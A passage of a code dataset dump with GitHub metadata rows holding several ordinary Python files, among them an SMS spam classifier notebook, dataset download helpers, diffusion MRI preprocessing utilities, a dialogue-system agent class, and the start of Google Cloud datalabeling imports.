blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7a665298381445c06ef1d20f617d8015614e5e5f | b8678e44ac58e72134a73b1d6cdb5ee461001910 | /Spam Ham | e81130a204541a0fcb15863eb2efe1192859821f | [] | no_license | pradepkaushik/Email-Classification-Model | 975a91e3cbd048add6359a14217f469560dd64f5 | 12d121118a4e0994b20b60fd57ded1ddbf1e53ce | refs/heads/master | 2021-04-23T17:23:43.129601 | 2020-03-25T10:14:10 | 2020-03-25T10:14:10 | 249,945,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,412 | #!/usr/bin/env python
# coding: utf-8

# Notebook-exported script: SMS spam/ham exploration with NLTK + pandas.
# The `# In[n]:` markers are the original Jupyter cell boundaries; bare
# expressions (e.g. `messages.head()`) only display output inside a notebook.

# In[1]:
import nltk

# In[ ]:
# Interactive NLTK downloader (run once to fetch the stopwords corpus).
nltk.download_shell()

# In[3]:
# Raw lines of the tab-separated SMSSpamCollection corpus.
messages = [line.rstrip() for line in open('SMSSpamCollection')]

# In[4]:
messages[0]

# In[6]:
import pandas as pd

# In[7]:
import seaborn as sns
sns.set_style('whitegrid')

# In[8]:
# Re-read the corpus as a DataFrame with label/message columns.
messages = pd.read_csv('SMSSpamCollection',sep='\t',names=['label','message'])

# In[9]:
messages.head()

# In[10]:
# Message length in characters — a simple spam/ham discriminator.
messages['length'] = messages['message'].apply(len)

# In[11]:
messages.head()

# In[12]:
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')

# In[13]:
messages['length'].plot.hist(bins=100)

# In[15]:
# Side-by-side length histograms for ham vs spam.
messages.hist(column='length',by='label',bins=50,figsize=(14,6))

# In[17]:
import string

# In[18]:
from nltk.corpus import stopwords

# In[ ]:

# In[20]:
# Worked example of the cleaning steps on a single string.
mess = 'Sample message! Notice: it has punctuation.'

# In[21]:
# Drop every punctuation character.
nopunc = [c for c in mess if c not in string.punctuation]

# In[24]:
nopunc = ''.join(nopunc)

# In[25]:
nopunc

# In[26]:
nopunc.split()

# In[27]:
# Drop English stopwords from the remaining tokens.
clean_mess = [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]

# In[28]:
clean_mess

# In[35]:
def text_process(messages):
    """
    Clean one raw SMS message string for vectorization.

    1. Remove punctuation
    2. Remove stopwords
    3. Return list of clean words

    Note: ``messages`` is a single message string here; the parameter name
    shadows the module-level DataFrame but is kept for call compatibility.
    """
    # PERF: build the stopword set once per call instead of re-reading the
    # NLTK list for every token; set membership is O(1) per word.
    stop_words = set(stopwords.words('english'))
    nopunc = [char for char in messages if char not in string.punctuation]
    nopunc = ''.join(nopunc)
    return [word for word in nopunc.split() if word.lower() not in stop_words]
# In[36]:
# Sanity check: tokenize the first few messages with the custom analyzer.
messages['message'].head(5).apply(text_process)

# In[37]:
from sklearn.feature_extraction.text import CountVectorizer

# In[63]:
# Bag-of-words model over the whole corpus, using text_process as analyzer.
bow_transformer = CountVectorizer(analyzer=text_process).fit(messages['message'])

# In[66]:
print(len(bow_transformer.vocabulary_))

# In[67]:
mess4 = messages['message'][3]

# In[68]:
mess4

# In[70]:
bow4 = bow_transformer.transform([mess4])

# In[71]:
print(bow4)

# In[45]:
# FIX: was `print(bgw4.shape)` — `bgw4` is an undefined name (typo for `bow4`).
print(bow4.shape)

# In[72]:
messages_bow = bow_transformer.transform(messages['message'])

# In[73]:
print(messages_bow.shape)

# In[74]:
from sklearn.feature_extraction.text import TfidfTransformer

# In[94]:
tfid_transformer = TfidfTransformer().fit(messages_bow)

# In[95]:
# FIX: was `tfid.transform(...)` but no name `tfid` exists; the fitted
# transformer is called `tfid_transformer`.
tfid4 = tfid_transformer.transform(bow4)

# In[96]:
print(tfid4)

# In[100]:
tfid_transformer.idf_[bow_transformer.vocabulary_['university']]

# In[86]:
# FIX: same undefined-name bug as above (`tfid` -> `tfid_transformer`).
message_tfid = tfid_transformer.transform(messages_bow)

# In[87]:
from sklearn.naive_bayes import MultinomialNB

# In[88]:
spam_detector = MultinomialNB().fit(message_tfid,messages['label'])

# In[89]:
spam_detector.predict(tfid4)[0]

# In[90]:
all_pred = spam_detector.predict(message_tfid)

# In[91]:
all_pred

# In[101]:
# FIX: `sklearn.cross_validation` was removed in scikit-learn 0.20;
# `train_test_split` lives in `sklearn.model_selection`.
from sklearn.model_selection import train_test_split

# In[102]:
msg_train,msg_test,label_train,label_test = train_test_split(messages['message'],messages['label'],test_size=0.3)

# In[92]:
from sklearn.pipeline import Pipeline

# In[103]:
# End-to-end pipeline: bag-of-words -> TF-IDF -> Naive Bayes classifier.
pipeline = Pipeline([
    ('bow',CountVectorizer(analyzer=text_process)),
    ('tfid',TfidfTransformer()),
    ('classifier',MultinomialNB())
])

# In[104]:
pipeline.fit(msg_train,label_train)

# In[107]:
predictions = pipeline.predict(msg_test)

# In[106]:
from sklearn.metrics import classification_report

# In[109]:
print(classification_report(label_test,predictions))
| [
"noreply@github.com"
] | noreply@github.com | |
ebb1c2cb7e3f2ab45f7cd3db4f3dd927b65ec36c | 58959a269778e07af98a32475f34ce7ea3c95755 | /src/data/download_data.py | 0f79a0344682bbe642616faff16e4ac064ebf91c | [
"BSD-3-Clause"
] | permissive | chandpes/force_2020_lith | a48b5c1f73034ed6c4490130f66f1d17fb67ebea | 37900b243d5e76aff90c55a296b01ff710c12df6 | refs/heads/main | 2023-03-05T05:14:00.481004 | 2021-02-14T17:00:18 | 2021-02-14T17:00:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,436 | py | import pandas as pd
import gdown
from src.definitions import ROOT_DIR
# All downloads land under <repo>/data/external.
OUTPUT_ROOT = ROOT_DIR / 'data/external'

# Make sure the destination directory exists before any download runs.
if not OUTPUT_ROOT.is_dir():
    OUTPUT_ROOT.mkdir(parents=True)
def download_from_google_drive(file_ids, output_root=None, redownload=False):
    """
    Fetch the selected files from Google Drive by their Drive IDs.

    Parameters
    ----------
    file_ids : dict
        Maps a destination file name (with extension) to the file's
        Google Drive ID.
    output_root : path like, optional
        Directory where the downloaded files are stored; defaults to
        ``OUTPUT_ROOT``.
    redownload : bool
        Fetch the file even when a copy already exists on disk.
    """
    destination = OUTPUT_ROOT if output_root is None else output_root
    for name, drive_id in file_ids.items():
        target = destination / name
        # Skip anything already on disk unless a re-download was requested.
        if target.exists() and not redownload:
            continue
        gdown.download("https://drive.google.com/uc?id=" + drive_id, str(target))
    return
def download_competition_files():
    """
    Download the competition files from Google Drive using their Google
    Drive IDs.
    """
    # Mapping of destination file name -> Google Drive file ID.
    file_ids = {
        # "Well log competion rules and description": "1Q_Z7xDREeTGqXvdmFuZ89e6PXN4I1miPLq1I17MTkds",
        "Confusion matrix all submitters.xlsx": "1f4DZPmwJFPG7hScEX_S2RbLdOF4IOH_U",
        "CSV_hidden_test.csv": "1PLWXrUQKmwMchAmcoJos0lmAm9MLEFnW",
        "CSV_test.csv": "17W3I_XfI0JlJ4mLJVtz4rGa0eZKWZ6Xv",
        "CSV_train.csv": "1hwDi05hwICWf95SOlofdKKYZUH79ReOa",
        "lithology scoring matrix cost function.xlsx": "11Hx1KBCy3vMWzzyqdVumZxIP37qi6kEZ",
        "NPD_Casing_depth_most_wells.xlsx": "10HjgB3f1_VpGjTiFPjJs37r6QYLX5T9T",
        "NPD_Lithostratigraphy_groups_all_wells.xlsx": "19oTHTNg5jXsss8sElbXQZtjJrJRaffku",
        "NPD_Lithostratigraphy_member_formations_all_wells.xlsx": "1X57eNXWW0_ilNO_ISvC6uz1o2OsPDZRP",
        "penalty_matrix.npy": "1eCH2LBFywpgopOcHG0RLGXEtBKb7LHhM",
        "starter_notebook.ipynb": "1uYG70pz2hh2nmgo6f3Hdg_IxQmyRGWEb",
        "Well logs abbreviation description.xlsx": "1EOxhQicZC5X-tbPwojvWxsHjst7IcIsy",
        "olawale_hidden_test_pred.csv": "16w0E1QPIdCDdoJRgAXQzqSPJ5eywQyMl",
        "olawale_open_test_pred.csv": "1--4oofS0p0tvLriRLs1UhkkbxaKdxlBO",
    }
    download_from_google_drive(file_ids)
    return
def download_well_meta():
    """
    Download well meta data from Norwegian Petroleum Directorate (NPD)
    and store it as ``well_meta_npd.csv`` under ``OUTPUT_ROOT``.
    """
    source_url = 'https://factpages.npd.no/ReportServer_npdpublic?/FactPages/TableView/wellbore_exploration_all&rs:Command=Render&rc:Toolbar=false&rc:Parameters=f&rs:Format=CSV&Top100=false&IpAddress=not_used&CultureCode=en'
    frame = pd.read_csv(source_url)
    frame.to_csv(OUTPUT_ROOT / 'well_meta_npd.csv', index=False)
def download_open_test_labels():
    """
    Download the open test set true labels and store them as
    ``open_test_y_true.csv`` under ``OUTPUT_ROOT``.
    """
    source_url = 'https://github.com/bolgebrygg/Force-2020-Machine-Learning-competition/raw/master/lithology_competition/data/leaderboard_test_target.csv'
    # The upstream file is semicolon-separated.
    labels = pd.read_csv(source_url, sep=';')
    labels.to_csv(OUTPUT_ROOT / 'open_test_y_true.csv', index=False)
if __name__ == "__main__":
    # Fetch everything the project needs into data/external.
    download_competition_files()
    download_well_meta()
    download_open_test_labels()
| [
"rafaelpinto.ve@gmail.com"
] | rafaelpinto.ve@gmail.com |
8f7c0b2b78a2a7b2d1cc56c7aa2ed1e4e1c9ee1e | 8ab7d7ed4c0a5dd97b0116aed96bc97d172f6fe6 | /utils/tools.py | 1a091031f1e4b02bf35124b6860b5210cf2c3a02 | [] | no_license | gsroberts1/UWAsthmaDiffusionProcessing | 23438d323eed84b1fbae8a339d29431b0d7c34c9 | 379b1839732f24821a148eed74523f145aa396fc | refs/heads/master | 2022-12-09T08:10:29.923142 | 2020-09-09T18:01:41 | 2020-09-09T18:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,386 | py | import string, os, sys, subprocess, shutil, time
from glob import glob
import numpy as np
import nibabel as nib
from dipy.segment.mask import median_otsu
from dipy.denoise.nlmeans import nlmeans
from dipy.denoise.noise_estimate import estimate_sigma
from dipy.io import read_bvals_bvecs
from dipy.io.bvectxt import reorient_vectors
def calculate_mean_img(input_img, output_img):
    """Average a 4D NIfTI volume over its last (time) axis and save the 3D mean."""
    source = nib.load(input_img)
    averaged = np.mean(source.get_data(), 3)
    result = nib.Nifti1Image(averaged.astype(np.float32), source.affine, source.header)
    # Carry the spatial orientation matrices over to the output image.
    result.set_sform(source.get_sform())
    result.set_qform(source.get_qform())
    nib.save(result, output_img)
def create_target_img(input_img, output_img, index=0):
    """Extract one 3D volume (by time index) from a 4D NIfTI image and save it."""
    source = nib.load(input_img)
    volume = source.get_data()[:, :, :, index]
    result = nib.Nifti1Image(volume.astype(np.float32), source.affine, source.header)
    # Carry the spatial orientation matrices over to the output image.
    result.set_sform(source.get_sform())
    result.set_qform(source.get_qform())
    nib.save(result, output_img)
def n4_bias_correct(input_img, output_img):
    """Run ANTs N4 bias-field correction (3D) on the given image via the shell."""
    cmd = 'N4BiasFieldCorrection -d 3 -i ' + input_img + ' -o ' + output_img
    os.system(cmd)
def bias_correct_mrtrix(input_img, input_mask, output_img, method='-ants', input_bval='', input_bvec='', nthreads='0'):
    """Bias-correct a DWI with MRtrix `dwibiascorrect`, optionally passing FSL gradients."""
    parts = ['dwibiascorrect -mask ' + input_mask + ' ' + method]
    # Only add the gradient table when both bval and bvec files are supplied.
    if input_bval != '' and input_bvec != '':
        parts.append(' -fslgrad ' + input_bvec + ' ' + input_bval + ' ')
    parts.append(' -force -quiet -nthreads ' + nthreads + ' ' + input_img + ' ' + output_img)
    os.system(''.join(parts))
def denoise_mrtrix(input_dwi, output_dwi, output_noise='', nthreads='0'):
    """Denoise a DWI with MRtrix `dwidenoise`, optionally writing the noise map."""
    if output_noise == '':
        os.system('dwidenoise ' + input_dwi + ' ' + output_dwi + ' -quiet -force')
    else:
        # A noise-map output also enables the thread-count option.
        os.system('dwidenoise ' + input_dwi + ' ' + output_dwi + ' -noise ' + output_noise + ' -nthreads ' + nthreads + ' -quiet -force')
def mrdegibbs_mrtrix(input_dwi, output_dwi, nthreads='0'):
    """Apply MRtrix `mrdegibbs` Gibbs-ringing correction to the given DWI."""
    cmd = 'mrdegibbs ' + input_dwi + ' ' + output_dwi + ' -nthreads ' + nthreads + ' -quiet -force'
    os.system(cmd)
def denoise_dipy(input_dwi, input_bval, input_bvec, mask_image, output_dwi):
    """
    Denoise a DWI volume with dipy's non-local means (nlmeans).

    The noise level sigma is estimated per-volume and then averaged over the
    minimum-b (b0-like) volumes only.

    :param input_dwi: path to the 4D DWI NIfTI image.
    :param input_bval: path to the b-values file.
    :param input_bvec: path to the b-vectors file.
    :param mask_image: path to the brain mask NIfTI image.
    :param output_dwi: path where the denoised image is written.
    """
    img = nib.load(input_dwi)
    data = img.get_data()
    mask = nib.load(mask_image).get_data()
    # FIX: img.get_affine() was deprecated and removed from nibabel; use the
    # .affine property, consistent with the other functions in this module.
    aff = img.affine
    sform = img.get_sform()
    qform = img.get_qform()

    bvals, bvecs = read_bvals_bvecs(input_bval, input_bvec)
    values = np.array(bvals)
    # Indices of the lowest-b volumes; sigma is averaged over these only.
    ii = np.where(values == bvals.min())[0]

    sigma = estimate_sigma(data)
    sigma = np.mean(sigma[ii])

    den = nlmeans(data, sigma=sigma, mask=mask)
    den_img = nib.Nifti1Image(den.astype(np.float32), aff, img.header)
    den_img.set_sform(sform)
    den_img.set_qform(qform)
    nib.save(den_img, output_dwi)
def correct_header_orientation(img_path, new_x, new_y, new_z):
    """
    Rewrite the sform/qform of a NIfTI header by remapping its axis rows.

    Each of ``new_x``/``new_y``/``new_z`` names the SOURCE axis ('x', 'y' or
    'z', optionally prefixed with '-' for a sign flip) whose row should
    populate the corresponding output row.  Any other specifier (including
    the identity mapping) leaves that row unchanged.  The file is modified
    in place.

    Generalization over the original if-chain: '-x' for new_x (and likewise
    '-y'/'-z' on their own axes) now performs an in-place flip instead of
    being silently ignored; all previously supported inputs behave the same.
    """
    img = nib.load(img_path)
    sform = img.get_sform()
    qform = img.get_qform()
    new_sform = img.get_sform()
    new_qform = img.get_qform()

    # Axis specifier -> (source row index, sign).
    axis_map = {
        'x': (0, 1.0), '-x': (0, -1.0),
        'y': (1, 1.0), '-y': (1, -1.0),
        'z': (2, 1.0), '-z': (2, -1.0),
    }

    for dest_row, spec in enumerate((new_x, new_y, new_z)):
        mapping = axis_map.get(spec)
        if mapping is None:
            continue  # unknown specifier: leave this row untouched
        src_row, sign = mapping
        new_sform[dest_row] = sign * sform[src_row]
        new_qform[dest_row] = sign * qform[src_row]

    out_img = img
    out_img.set_sform(new_sform)
    out_img.set_qform(new_qform)
    out_img.to_filename(img_path)
| [
"noreply@github.com"
] | noreply@github.com |
bed29e9ff8152098f941c3ec5f2d8c4d3a7581b0 | 99040574b2d19995330f5e58bc90133d671b1b13 | /Production/GO-Chatbots/core/dm/dialogue_system.py | 9210c28a99a9dcda564dc7a8ecc3a7d0032d7333 | [
"MIT"
] | permissive | IlievskiV/Master_Thesis_GO_Chatbots | acc94cf023f5bd49186738d4e4dfeadda17f1bce | 6fbba12afbbf51b7a6b6067e9448e5ef673fda16 | refs/heads/master | 2021-04-06T10:03:03.290786 | 2018-03-16T13:10:35 | 2018-03-16T13:10:35 | 125,334,116 | 13 | 4 | null | null | null | null | UTF-8 | Python | false | false | 7,374 | py | """
Author: Vladimir Ilievski <ilievski.vladimir@live.com>
A Python file for the entire Goal-Oriented Dialogue System.
"""
from core import constants as const
from core.environment.environment import GOEnv
import core.agent.agents as agents
from core.agent.processor import GOProcessor
from core.dm.kb_helper import GOKBHelper
import cPickle as pickle
import logging
from keras.optimizers import Adam
from rl.callbacks import FileLogger, ModelIntervalCheckpoint
class GODialogSys(object):
    """
    The GO Dialogue System mediates the interaction between the environment and the agent.

    # Class members:

        - ** agent **: the type of conversational agent. Default is None (temporarily).
        - ** environment **: the environment with which the agent and user interact. Default is None (temporarily).
        - ** act_set **: static set of all dialogue acts (intents) used in the dialogue: request, inform,
              confirm_question, confirm_answer, greeting, closing, multiple_choice, thanks, welcome, deny, not_sure.
        - ** slot_set **: the set of all slots used in the dialogue.
        - ** knowledge_dict_path **: path to any knowledge dictionary for the database.
        - ** agt_feasible_actions **: list of templates described as dictionaries, corresponding to each action
              the agent might take.
        - ** max_nb_turns **: the maximal number of dialogue turns.
        - ** ultimate_request_slot **: the slot that is the actual goal of the user, and everything is around this slot.
    """

    def __init__(self, act_set=None, slot_set=None, goal_set=None, init_inform_slots=None, ultimate_request_slot=None,
                 kb_special_slots=None, kb_filter_slots=None, agt_feasible_actions=None, agt_memory=None,
                 agt_policy=None, agt_warmup_policy=None, agt_eval_policy=None, params=None):
        """
        Constructor of the class.

        :param act_set: set of all dialogue acts (intents).
        :param slot_set: set of all slots used in the dialogue.
        :param goal_set: set of user goals for the simulated user.
        :param init_inform_slots: slots the user informs at the start of the dialogue.
        :param ultimate_request_slot: the slot that is the actual goal of the user.
        :param kb_special_slots: knowledge-base slots receiving special treatment.
        :param kb_filter_slots: knowledge-base slots used for filtering results.
        :param agt_feasible_actions: list of action templates the agent may take.
        :param agt_memory: replay memory used by the RL agent.
        :param agt_policy: training policy of the agent.
        :param agt_warmup_policy: policy used during the warm-up phase.
        :param agt_eval_policy: policy used during evaluation.
        :param params: dict of remaining hyper-parameters (keys defined in `core.constants`).
        """
        logging.info('Calling `GODialogSys` constructor')

        # Initialize the act set and slot set
        self.act_set = act_set
        self.slot_set = slot_set
        self.goal_set = goal_set
        self.init_inform_slots = init_inform_slots
        self.ultimate_request_slot = ultimate_request_slot
        self.kb_special_slots = kb_special_slots
        self.kb_filter_slots = kb_filter_slots

        # maximal number of turns
        self.max_nb_turns = params[const.MAX_NB_TURNS]

        # create the knowledge base helper class
        # (the knowledge dictionary is unpickled from the path given in `params`)
        self.knowledge_dict = pickle.load(open(params[const.KB_PATH_KEY], 'rb'))
        self.kb_helper = GOKBHelper(self.ultimate_request_slot, self.kb_special_slots, self.kb_filter_slots,
                                    self.knowledge_dict)

        self.agt_feasible_actions = agt_feasible_actions

        # create the environment
        self.env = self.__create_env(params)

        # agent-related hyper-parameters (read before building the agent itself)
        self.go_processor = GOProcessor(feasible_actions=self.agt_feasible_actions)
        self.nb_actions = len(self.agt_feasible_actions)
        self.agt_memory = agt_memory
        self.gamma = params[const.GAMMA_KEY]
        self.batch_size = params[const.BATCH_SIZE_KEY]
        self.nb_steps_warmup = params[const.NB_STEPS_WARMUP_KEY]
        self.train_interval = params[const.TRAIN_INTERVAL_KEY]
        self.memory_interval = params[const.MEMORY_INTERVAL_KEY]
        self.target_model_update = params[const.TARGET_MODEL_UPDATE_KEY]
        self.agt_policy = agt_policy
        self.agt_warmup_policy = agt_warmup_policy
        self.agt_eval_policy = agt_eval_policy
        self.enable_double_dqn = params[const.ENABLE_DOUBLE_DQN_KEY]
        self.enable_dueling_network = params[const.ENABLE_DUELING_NETWORK_KEY]
        self.dueling_type = params[const.DUELING_TYPE_KEY]
        # the state dimension is dictated by the environment's state tracker
        self.state_dimension = self.env.get_state_dimension()
        self.hidden_size = params[const.HIDDEN_SIZE_KEY]
        self.act_func = params[const.ACTIVATION_FUNCTION_KEY]

        # create the specified agent type
        self.agent = self.__create_agent(params)

    def __create_env(self, params):
        """
        Private helper method for creating an environment given the parameters.

        # Arguments:

            - ** params **: the params for creating the environment

        ** return **: the newly created environment
        """
        logging.info('Calling `GODialogSys` __create_env method')

        # Create the environment
        env = GOEnv(self.act_set, self.slot_set, self.goal_set, self.init_inform_slots, self.ultimate_request_slot,
                    self.agt_feasible_actions, self.kb_helper, params)

        return env

    def __create_agent(self, params):
        """
        Private helper method for creating an agent depending on the given type as a string.

        :return: the newly created agent (or None for an unknown agent type).
        """
        logging.info('Calling `GODialogSys` __create_agent method')

        agent = None
        agent_type_value = params[const.AGENT_TYPE_KEY]

        if agent_type_value == const.AGENT_TYPE_DQN:
            agent = agents.GODQNAgent(processor=self.go_processor, nb_actions=self.nb_actions, memory=self.agt_memory,
                                      gamma=self.gamma, batch_size=self.batch_size,
                                      nb_steps_warmup=self.nb_steps_warmup,
                                      train_interval=self.train_interval, memory_interval=self.memory_interval,
                                      target_model_update=self.target_model_update, policy=self.agt_policy,
                                      warmup_policy=self.agt_warmup_policy,
                                      eval_policy=self.agt_eval_policy, enable_double_dqn=self.enable_double_dqn,
                                      enable_dueling_network=self.enable_dueling_network,
                                      dueling_type=self.dueling_type,
                                      output_dim=self.nb_actions, state_dimension=self.state_dimension,
                                      hidden_size=self.hidden_size, act_func=self.act_func)
            # NOTE(review): compile is placed inside the DQN branch because
            # `agent` is still None for any other type and compiling would
            # fail; confirm against the original source (indentation was lost
            # in this copy of the file).
            agent.compile(Adam(lr=.00025), metrics=['mae'])

        return agent

    def train(self, nb_epochs, nb_warmup_episodes, nb_episodes_per_epoch, res_path, weights_file_name):
        """
        Method for training the system.

        # Arguments:

            - ** nb_epochs **: total number of training epochs.
            - ** nb_warmup_episodes **: number of warm-up episodes before learning starts.
            - ** nb_episodes_per_epoch **: number of dialogue episodes per epoch.
            - ** res_path **: path where the training results are stored.
            - ** weights_file_name **: file the trained agent weights are saved to (overwritten).
        """
        self.agent.fit(env=self.env, nb_epochs=nb_epochs, nb_warmup_episodes=nb_warmup_episodes,
                       nb_episodes_per_epoch=nb_episodes_per_epoch, res_path=res_path)
        self.agent.save_weights(weights_file_name, overwrite=True)

    def initialize(self):
        """
        Method for initializing the dialogue.
        """
| [
"ilievski.vladimir@live.com"
] | ilievski.vladimir@live.com |
b3d2499cc45fea03a267a459dd73d738e8962baa | 601362aea0d323309bea046d93ef3f2abe090718 | /flog/libs/wikipedia.py | b8f67543bdc12c2b8f795d5ecf414fb4fbf6e2b9 | [] | no_license | ErikBurdett/flog | cca1d780835351b7017b993e4047d43a437c6504 | 633bd3ff95b62766fcf40d76513d27b8785870a0 | refs/heads/master | 2022-10-30T17:01:31.538700 | 2020-06-16T04:40:14 | 2020-06-16T04:40:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | import requests
def random_article():
    """Return the JSON payload for a random Wikipedia article title."""
    endpoint = 'https://en.wikipedia.org/api/rest_v1/page/random/title'
    return requests.get(endpoint, timeout=2.0).json()
| [
"randy@thesyrings.us"
] | randy@thesyrings.us |
cd6c4622e3513f55a114eb7fc77c82980c625ac0 | b93f31825ed08966b2b617552b5e79ce696dc9cf | /create_database.py | e6b8fa494e56f56f5a03148782bc6dd4f09c6612 | [] | no_license | ngangavic/pythonsamples | 3bc59eaee33abc044dd586dae1d05a85508b78c4 | b916e8f269716739d0b8dc65e0a695f9c1470b80 | refs/heads/master | 2020-07-28T22:47:15.799435 | 2019-09-19T14:48:17 | 2019-09-19T14:48:17 | 209,566,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | import demo_mysql_connector
# create database
# NOTE(review): relies on `demo_mysql_connector` exposing an already-open
# `database` connection; re-running raises if `pythondb` already exists.
cursor = demo_mysql_connector.database.cursor()
cursor.execute("CREATE DATABASE pythondb")
"ngangavictor10@gmail.com"
] | ngangavictor10@gmail.com |
86436b8a697389fde7ff1382bfff97f0629c044f | 37b92cfbbfbd9d1ab40db7350232e5cb763d852b | /Single_Server/assets/status.py | 7a3260b45096a4abf3187da982ed577c739a0eb2 | [] | no_license | karenbocardo/com139-class | 9bd1e4d83fd31ff76496141b29e23bf4efc665ea | aa60f1fd226663de37ea781e4167af156de96898 | refs/heads/master | 2023-06-09T17:09:56.048808 | 2021-06-29T05:27:36 | 2021-06-29T05:27:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | from enum import Enum
class Status(Enum):
    """States a generated customer can be in during the simulation."""

    # Each member's value is a (code, description) tuple.
    UNDEFINED = 0, 'UNDEFINED state. (Not in use)'
    SUCCESS = 1, 'SUCCESS state.'
    WAIT = 2, 'WAITING state.'
    RENEGED = 3, 'RENEGED state. Used when the gen_customer is tired of waiting'

    def __str__(self):
        # The printable form is just the member name.
        return self.name
| [
"gacastil@up.edu.mx"
] | gacastil@up.edu.mx |
810bf355ace92ebc37e0d77e7bf8b58519ee67c4 | be0388dfda0602ae49eb6bd4efe24703f7288cf2 | /google/cloud/datalabeling/__init__.py | dbfce79fa39bb5622d98a9a16c979c2ba602ff41 | [
"Apache-2.0"
] | permissive | renovate-bot/python-datalabeling | 3211e3f71bba67a8272d48492abdbaa75def3a54 | f2d2282ae971ac946de166c6449e923bc94432cb | refs/heads/master | 2023-06-08T06:38:30.633651 | 2021-08-13T15:31:29 | 2021-08-13T15:31:29 | 237,521,154 | 0 | 0 | Apache-2.0 | 2020-01-31T21:43:01 | 2020-01-31T21:43:00 | null | UTF-8 | Python | false | false | 17,802 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.cloud.datalabeling_v1beta1.services.data_labeling_service.client import (
DataLabelingServiceClient,
)
from google.cloud.datalabeling_v1beta1.services.data_labeling_service.async_client import (
DataLabelingServiceAsyncClient,
)
from google.cloud.datalabeling_v1beta1.types.annotation import Annotation
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationMetadata
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationValue
from google.cloud.datalabeling_v1beta1.types.annotation import BoundingPoly
from google.cloud.datalabeling_v1beta1.types.annotation import (
ImageBoundingPolyAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import (
ImageClassificationAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import ImagePolylineAnnotation
from google.cloud.datalabeling_v1beta1.types.annotation import (
ImageSegmentationAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import NormalizedBoundingPoly
from google.cloud.datalabeling_v1beta1.types.annotation import NormalizedPolyline
from google.cloud.datalabeling_v1beta1.types.annotation import NormalizedVertex
from google.cloud.datalabeling_v1beta1.types.annotation import ObjectTrackingFrame
from google.cloud.datalabeling_v1beta1.types.annotation import OperatorMetadata
from google.cloud.datalabeling_v1beta1.types.annotation import Polyline
from google.cloud.datalabeling_v1beta1.types.annotation import SequentialSegment
from google.cloud.datalabeling_v1beta1.types.annotation import (
TextClassificationAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import (
TextEntityExtractionAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import TimeSegment
from google.cloud.datalabeling_v1beta1.types.annotation import Vertex
from google.cloud.datalabeling_v1beta1.types.annotation import (
VideoClassificationAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import VideoEventAnnotation
from google.cloud.datalabeling_v1beta1.types.annotation import (
VideoObjectTrackingAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationSentiment
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationSource
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationType
from google.cloud.datalabeling_v1beta1.types.annotation_spec_set import AnnotationSpec
from google.cloud.datalabeling_v1beta1.types.annotation_spec_set import (
AnnotationSpecSet,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
CreateAnnotationSpecSetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
CreateDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
CreateEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
CreateInstructionRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteAnnotatedDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteAnnotationSpecSetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteInstructionRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ExportDataRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetAnnotatedDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetAnnotationSpecSetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetDataItemRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetEvaluationRequest,
